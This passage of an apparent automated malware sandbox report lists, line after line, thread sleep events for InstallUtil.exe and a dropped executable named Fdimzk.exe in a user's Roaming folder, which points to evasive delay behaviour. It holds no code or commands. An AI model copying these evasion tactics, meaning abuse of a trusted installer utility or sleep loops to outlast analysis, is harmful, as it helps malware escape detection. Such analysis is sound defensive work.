                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -97592s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -97483s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -97374s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -97265s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -97156s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -97046s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -96924s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -96796s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -96687s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -96578s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -96468s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -96359s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -96249s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -96139s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -96030s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -95877s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -95750s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -95604s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -95499s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -95259s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -95090s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -94982s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -94874s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -94764s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -94655s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -94546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -94437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -94327s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -94217s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -94108s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -93999s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4352Thread sleep time: -93888s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -37815825351104557s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -99890s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -99781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -99672s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -99562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -99453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -99344s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -99234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -99125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -99015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -98906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -98797s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -98687s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -98578s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -98469s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -98359s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -98250s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -98141s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -98031s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -97922s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -97799s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -97686s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -97570s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -97266s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -97156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -97047s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -96937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -96828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -96718s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -96609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -96500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -96390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -96281s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -96172s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -96051s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95718s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95281s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95172s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -95061s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -94952s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -94809s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -94549s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -94329s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -94203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -94094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -93984s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep count: 35 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 6824Thread sleep count: 4288 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99843s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 6824Thread sleep count: 5484 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99718s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99953s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99844s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99734s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99624s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99515s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99406s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99297s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99185s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99078s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98963s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98856s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98750s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98640s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98422s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98308s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98200s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97982s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97871s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97764s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97651s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97534s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97406s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97269s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97140s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97028s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96922s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96797s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96683s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96555s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96342s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96119s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95989s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95859s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95750s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95640s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95422s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95312s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95202s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95093s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -94904s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -94679s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -94432s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep count: 41 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -37815825351104557s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3956Thread sleep count: 2895 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -99875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3956Thread sleep count: 6937 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -99766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -99656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -99546s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -99433s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -99316s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98983s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98730s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98605s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98499s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98391s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98275s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98156s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98047s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97937s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97828s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97719s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97594s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97485s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97360s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97235s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97110s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96985s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96860s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96735s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96610s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96485s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96360s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96235s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96110s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95984s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95547s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95437s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95094s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94985s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94860s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94735s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94610s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94485s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94360s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94235s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94110s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -93985s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep count: 32 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -29514790517935264s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3436Thread sleep count: 2089 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3436Thread sleep count: 7769 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99765s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99546s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99437s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99218s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98890s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98562s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98015s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97906s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97687s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97561s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97015s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96900s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96562s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96453s >= -30000s
